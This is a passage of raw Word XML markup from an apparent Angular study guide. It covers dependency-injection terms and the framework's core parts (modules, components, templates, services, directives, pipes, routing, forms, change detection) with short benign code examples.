          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D498301" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="0089595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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0833BE3E" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="0089595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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="721EFB65" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E1129BD"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Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137B0943"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ells Angular how to create or get a dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="22BE6D7B" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="299F4A67"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Injector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EF61CDF"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sponsible for maintaining and providing services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7353A6BB" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E7AD2AF"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Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F17CF5"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A key used to locate a dependency (usually the class itself)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="02BF2668" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B304B11"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Injectable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36BCC430"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Decorator marking a class as available for DI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A310366" w14:textId="77777777" w:rsidR="00895951"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13B0B9C">
          <v:rect id="_x0000_i3537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C52EC" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DI in Services (Chaining Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E603AD"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027B273"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5E53C"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1D67F827"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AuthService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7C357"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constructor(private logger: LoggerService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDABE9" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="0089595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47145283" w14:textId="08EA304D" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="4E6B640D">
          <v:rect id="_x0000_i3538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83660D" w14:textId="2F9B23AE" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00410D60">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="869" w:name="_Toc196308349"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different components of Angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="869"/>
    </w:p>
    <w:p w14:paraId="7D4C91AF" w14:textId="5013A5FA" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="003C7C02" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CC724A" w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ngular applications are built using several core components that work together to create the structure of the application. Here’s an overview of the main components in Angular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DEAAB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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 Modules (@NgModule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0AB50"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Angular applications are organized into </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which act as containers for the different parts of an application. A module bundles related code, such as components, services, and other modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D90C61"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BCC9CB"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NgModule({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A964171"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declarations: [AppComponent, MyComponent],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21597DF2"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imports: [BrowserModule, HttpClientModule],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014163FE"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providers: [MyService],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5A7CB"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bootstrap: [AppComponent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2222EA25"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307D52C0"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AppModule {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC6A43" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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2. Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5765C"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Components are the building blocks of an Angular application. They control a section of the user interface (UI) and are composed of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAA873" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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HTML template</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D1586" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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CSS styles</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the appearance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF9609" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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TypeScript class</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains the logic and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBC7BC"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EA69C9"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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E932D6"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selector: 'app-my-component',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E502E61"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emplateUrl: './my-component.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15103BFF"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styleUrls: ['./my-component.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA69C0"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1817A280"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MyComponent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1C15E"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message = 'Hello, Angular!';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D242E2E"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200C7E4B" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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3. Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A55C629"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Templates define the HTML structure for the component. They can contain Angular-specific syntax, such as data binding, directives, and event handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FCE3C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7CE9A"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lastRenderedPageBreak/>
        <w:t>&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7DDEFC"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lt;h1&gt;{{ message }}&lt;/h1&gt; &lt;!-- Interpolation binding --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE038E4"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lt;button (click)="changeMessage()"&gt;Change Message&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF390BF"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lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404A410" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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4. Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116C7E3"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Services are used to share data and logic across components and modules. Services are typically injected into components using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF33A5"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766D1528"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D1A607"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DB362D"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5EBA622B"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DataService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F54F559"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fetchData() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955161F"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return ['Data 1', 'Data 2', 'Data 3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E8559"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798E51E3"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63E87843" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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5. Directives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A81DF"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directives are special markers in the DOM that add behavior to elements. There are three types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335388D" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Structural directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modify the DOM layout (e.g., *ngFor, *ngIf).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC772AE" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Attribute directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modify the appearance or behavior of an element (e.g., ngClass, ngStyle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8767FD" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Custom directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also create your own directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD022B"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38FA5E"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lt;div *ngIf="isVisible"&gt;This is visible!&lt;/div&gt;  &lt;!-- Structural Directive --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9E4AF"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lt;button [ngClass]="{ 'highlighted': isHighlighted }"&gt;Click Me&lt;/button&gt;  &lt;!-- Attribute Directive --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6BCDB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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6. Pipes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7E8A3"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pipes are used to transform data before displaying it in the view. Angular has built-in pipes like DatePipe, CurrencyPipe, and UpperCasePipe. You can also create custom pipes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F648F35"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD69D80"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lt;p&gt;{{ birthday | date: 'short' }}&lt;/p&gt;  &lt;!-- DatePipe --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076508A7"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lt;p&gt;{{ price | currency }}&lt;/p&gt;  &lt;!-- CurrencyPipe --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A099747" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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7. Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD69DD"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Angular Router helps navigate between views or pages in a single-page application (SPA). It is defined in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AppRoutingModule</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and manages URL mapping and route navigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D332C7"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514FE0EC"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st routes: Routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00749568"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 path: '', component: HomeComponent },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139457D4"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 path: 'about', component: AboutComponent }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA1777"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6162FF17" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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8. Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE10932"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Angular provides two ways to work with forms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A95F6" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Template-driven forms</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Declarative forms defined using templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7CD31" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Reactive forms</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Programmatically created forms using FormGroup and FormControl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D17ADEF"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Example (Reactive Form):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078A18F"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his.form = new FormGroup({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDACEFA"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name: new FormControl('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B433977"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3D0072C2" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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9. Dependency Injection (DI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F3EDD"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> DI is a design pattern used by Angular to manage services and objects. It allows components and services to be provided dependencies via the constructor, rather than creating them directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765B7B93"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA0A7B2"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structor(private dataService: DataService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E23B7" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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0. Change Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD0B55"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Purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Angular’s change detection mechanism ensures that the UI reflects the current state of the application’s data. It listens to changes in application data and updates the DOM when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03688C48" w14:textId="77777777" w:rsidR="00CC724A"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3A0DD09">
          <v:rect id="_x0000_i3539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA55CF" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Summary of Key Compon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51"/>
        <w:gridCol w:w="5439"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="0CC9916D" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1AD41F" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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lastRenderedPageBreak/>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03486EA6" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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Purpose</w:t>
            </w:r>
          </w:p>
